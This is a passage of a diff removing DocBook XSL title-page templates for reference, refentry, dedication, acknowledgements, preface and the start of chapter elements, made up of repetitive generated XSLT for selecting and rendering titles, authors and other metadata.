-<xsl:template match="abstract" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="reference.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="referenceinfo/title">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="referenceinfo/subtitle">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/corpauthor"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/authorgroup"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/author"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/othercredit"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/releaseinfo"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/copyright"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/legalnotice"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/pubdate"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/revision"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/revhistory"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/abstract"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="reference.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="reference.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="reference.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="reference.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="reference.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="reference.titlepage.before.recto"/>
-      <xsl:call-template name="reference.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="reference.titlepage.before.verso"/>
-      <xsl:call-template name="reference.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="reference.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="reference.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="reference.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.recto">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="refentry.titlepage.before.recto"/>
-      <xsl:call-template name="refentry.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="refentry.titlepage.before.verso"/>
-      <xsl:call-template name="refentry.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="refentry.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="refentry.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="refentry.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.recto">
-  <div xsl:use-attribute-sets="dedication.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::dedication[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="dedicationinfo/subtitle">
-      <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="dedicationinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="dedication.titlepage.before.recto"/>
-      <xsl:call-template name="dedication.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="dedication.titlepage.before.verso"/>
-      <xsl:call-template name="dedication.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="dedication.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="dedication.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="dedication.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="dedication.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="dedication.titlepage.recto.style">
-<xsl:apply-templates select="." mode="dedication.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.recto">
-  <div xsl:use-attribute-sets="acknowledgements.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::acknowledgements[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="acknowledgementsinfo/subtitle">
-      <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="acknowledgementsinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="acknowledgements.titlepage.before.recto"/>
-      <xsl:call-template name="acknowledgements.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="acknowledgements.titlepage.before.verso"/>
-      <xsl:call-template name="acknowledgements.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="acknowledgements.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="acknowledgements.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="acknowledgements.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="acknowledgements.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="acknowledgements.titlepage.recto.style">
-<xsl:apply-templates select="." mode="acknowledgements.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="preface.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="prefaceinfo/title">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="prefaceinfo/subtitle">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/corpauthor"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/authorgroup"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/author"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/othercredit"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/releaseinfo"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/copyright"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/legalnotice"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/pubdate"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/revision"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/revhistory"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/abstract"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="preface.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="preface.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="preface.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="preface.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="preface.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="preface.titlepage.before.recto"/>
-      <xsl:call-template name="preface.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="preface.titlepage.before.verso"/>
-      <xsl:call-template name="preface.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="preface.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="preface.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="preface.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="preface.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="preface.titlepage.recto.style">
-<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="chapterinfo/title">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/title"/>
